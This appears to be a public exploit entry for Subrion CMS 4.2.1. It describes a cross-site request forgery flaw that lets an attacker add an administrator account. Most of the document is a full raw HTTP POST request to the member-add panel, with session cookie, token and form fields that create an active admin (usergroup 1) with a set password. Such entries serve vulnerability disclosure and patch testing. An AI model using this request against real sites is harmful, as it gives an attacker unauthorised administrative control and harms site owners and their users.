# Exploit Title: Subrion CMS 4.2.1 - Cross Site Request Forgery (CSRF) (Add Amin) # Date: 2022-02-09 # Exploit Author: Aryan Chehreghani # Vendor Homepage: https://subrion.org # Software Link: https://subrion.org/download # Version: 4.2.1 # Tested on: Windows 10 # [ About - Subrion CMS ]: #Subrion is a PHP/MySQL based CMS & framework, #that allows you to build websites for any purpose, #Yes, from blog to corporate mega portal. # [ Description ]: # CSRF vulnerability was discovered in 4.2.1 version of Subrion CMS, # With this vulnerability, authorized users can be added to the system. # [ Sample CSRF Request ]: POST /subrion/panel/members/add/ HTTP/1.1 Host: localhost User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:96.0) Gecko/20100101 Firefox/96.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8 Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate Content-Type: multipart/form-data; boundary=---------------------------386122140640094420852486902 Content-Length: 2522 Origin: http://localhost Connection: close Referer: http://localhost/subrion/panel/members/add/ Cookie: loader=loaded; INTELLI_ffd8ae8438=ftph4lgam8hugh8j0mgv8j4q2l Upgrade-Insecure-Requests: 1 Sec-Fetch-Dest: document Sec-Fetch-Mode: navigate Sec-Fetch-Site: same-origin Sec-Fetch-User: ?1 -----------------------------386122140640094420852486902 Content-Disposition: form-data; name="__st" YNXrr7MjSY0Qi0JYISJ7DRuC9Gd1zxPYwjHcFKVh -----------------------------386122140640094420852486902 Content-Disposition: form-data; name="username" Aryan -----------------------------386122140640094420852486902 Content-Disposition: form-data; name="fullname" AryanChehreghani -----------------------------386122140640094420852486902 Content-Disposition: form-data; name="email" aryanchehreghani@yahoo.com -----------------------------386122140640094420852486902 Content-Disposition: form-data; name="_password" Test1234! -----------------------------386122140640094420852486902 Content-Disposition: form-data; name="_password2" Test1234! -----------------------------386122140640094420852486902 Content-Disposition: form-data; name="usergroup_id" 1 -----------------------------386122140640094420852486902 Content-Disposition: form-data; name="website" -----------------------------386122140640094420852486902 Content-Disposition: form-data; name="phone" -----------------------------386122140640094420852486902 Content-Disposition: form-data; name="biography" -----------------------------386122140640094420852486902 Content-Disposition: form-data; name="facebook" -----------------------------386122140640094420852486902 Content-Disposition: form-data; name="twitter" -----------------------------386122140640094420852486902 Content-Disposition: form-data; name="gplus" -----------------------------386122140640094420852486902 Content-Disposition: form-data; name="linkedin" -----------------------------386122140640094420852486902 Content-Disposition: form-data; name="email_language" en -----------------------------386122140640094420852486902 Content-Disposition: form-data; name="sponsored" 0 -----------------------------386122140640094420852486902 Content-Disposition: form-data; name="featured" 0 -----------------------------386122140640094420852486902 Content-Disposition: form-data; name="featured_end" 2022-03-09 12:03 -----------------------------386122140640094420852486902 Content-Disposition: form-data; name="status" active -----------------------------386122140640094420852486902 Content-Disposition: form-data; name="save" 1 -----------------------------386122140640094420852486902 Content-Disposition: form-data; name="goto" list -----------------------------386122140640094420852486902--